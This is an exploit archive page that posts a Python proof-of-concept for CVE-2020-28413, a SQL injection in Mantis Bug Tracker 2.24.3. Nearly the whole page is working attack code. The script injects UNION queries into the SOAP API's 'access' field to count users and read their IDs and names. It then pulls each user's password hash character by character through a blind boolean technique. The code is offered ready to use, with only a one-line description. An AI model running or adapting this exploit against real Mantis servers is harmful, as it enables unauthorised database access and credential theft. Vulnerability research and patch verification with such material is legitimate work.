exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mantis Bug Tracker 2.24.3 SQL Injection

Mantis Bug Tracker 2.24.3 SQL Injection
Posted Jan 4, 2021
Authored by EthicalHCOP

Mantis Bug Tracker version 2.24.3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2020-28413
SHA-256 | 3c8957612d86d7577fdde28ee21d1df81ea67d1228ac3abae6f808678afa40ae

Mantis Bug Tracker 2.24.3 SQL Injection

Change Mirror Download
# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
# Date: 30/12/2020
# Exploit Author: EthicalHCOP
# Vendor Homepage: https://www.mantisbt.org/
# Version: 2.24.3
# CVE: CVE-2020-28413

import requests, sys, time
from lxml import etree

proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}

def Hacer_Peticion(query):
home = ""
url = home+"/api/soap/mantisconnect.php"
headers = {'content-type': 'text/xml',
'SOAPAction': url+'"/mc_project_get_users"'}
mantis_db_user = ""
mantis_db_pass = ""
body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect">
<soapenv:Header/>
<soapenv:Body>
<man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">"""+mantis_db_user+"""</username>
<password xsi:type="xsd:string">"""+mantis_db_pass+"""</password>
<project_id xsi:type="xsd:integer">0</project_id>
<access xsi:type="xsd:string">"""+query+"""</access>
</man:mc_project_get_users>
</soapenv:Body>
</soapenv:Envelope>"""
response = requests.post(url, data=body, headers=headers, verify=False)
#response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
parser = etree.XMLParser(remove_blank_text=True)
xml = etree.XML(response.content, parser)
xml = etree.tostring(xml)
return(str(xml))

def Cantidad_Usuarios_Mantis():
query = "0 union all select concat('-',(select count(*) " \
"from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
xml = Hacer_Peticion(query)
txt = xml.split("integer")
txt = txt[1].split("id")
registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
return(registros)

def Obtener_Id(usr_pos):
query = "0 union all select concat((SELECT id FROM mantis_user_table " \
"order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
xml = Hacer_Peticion(query)
txt = xml.split("integer")
txt = txt[1].split("id")
id = str(str(txt[0])[:-2])[-1:]
name = str(str(txt[1])[29:]).split("</name>")[0]
return (id+"-"+name)

def brute_force(data):
charts = "abcdefghijklmnopqrstuvwxyz0123456789"
passw = ""
id = data.split("-")[0]
name = data.split("-")[1]
for cp in range (1,33,1):
for c in charts:
print(f"\rHash: {passw}", end="")
time.sleep(0.00001)
sys.stdout.flush()
query = "0 union all select (select if(substring((select binary(password) " \
"from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
xml = Hacer_Peticion(query)
txt = xml.split("integer")
txt = txt[1].split("id")
r_id = str(str(txt[0])[:-2])[-1:]
if(r_id=="0"):
passw = passw + str(c)
break
print(f"\r", end="")
sys.stdout.flush()
print(name+": "+passw)

def main():
cantidad_users = Cantidad_Usuarios_Mantis()
print("Cantidad usuarios en db: "+str(cantidad_users))
print("Obteniendo Hashes...")
for x in range(0,int(cantidad_users),1):
brute_force(Obtener_Id(x))

if __name__ == "__main__":
main()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close